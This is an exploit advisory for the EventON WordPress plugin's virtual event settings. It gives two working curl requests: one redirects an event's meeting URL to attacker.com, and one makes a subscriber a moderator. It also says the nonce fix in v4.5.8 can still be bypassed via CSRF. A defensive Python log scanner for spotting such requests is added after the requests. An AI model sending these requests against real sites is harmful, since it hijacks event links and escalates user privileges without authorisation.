## https://sploitus.com/exploit?id=WPEX-ID:73D1B00E-1F17-4D9A-BFC8-6BC43A46B90B
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:

```
curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'
```

To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:

```
curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'
```
v4.5.8 of the premium plugin added capability and CSRF checks; however, the nonce verification is flawed, still allowing the issue to be exploited via CSRF.
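For defenders reviewing a site that ran an affected version, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for requests to the two AJAX actions named above and labels each by Referer origin, since a cross-site Referer is consistent with the CSRF path that remains after v4.5.8. It assumes Combined Log Format; the function name `scan`, the host `other-site.test` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# AJAX actions named in the proof-of-concept requests on this page.
WATCHED = {"eventon_save_virtual_event_settings",
           "eventon_save_virtual_mod_settings"}
# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"')

def scan(lines, site_host):
    """Return one finding per logged request that hit a watched AJAX action."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        if not target.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # PHP keeps the last value when a query parameter is repeated.
        action = parse_qs(target.query).get("action", [""])[-1]
        if action not in WATCHED:
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host is None:
            origin = "no-referer"   # scripted client, e.g. curl
        elif ref_host.lower() == site_host.lower():
            origin = "same-site"    # likely the legitimate admin UI
        else:
            origin = "cross-site"   # consistent with a CSRF-driven request
        findings.append({"ip": m["ip"], "time": m["time"], "action": action,
                         "status": int(m["status"]), "origin": origin})
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings HTTP/1.1" 200 12 "-" "curl/8.0"',
    '198.51.100.4 - - [01/Jan/2024:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings HTTP/1.1" 200 12 "https://other-site.test/page" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2024:10:06:00 +0000] "POST /wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings HTTP/1.1" 200 12 "https://example.com/wp-admin/post.php?post=240" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2024:10:07:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 50 "https://example.com/wp-admin/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE, "example.com"):
        print(f)
```

Access logs record only the request line, so a request that carries `action` in the POST body instead of the query string will not be matched; catching those requires request-body logging at a WAF or reverse proxy.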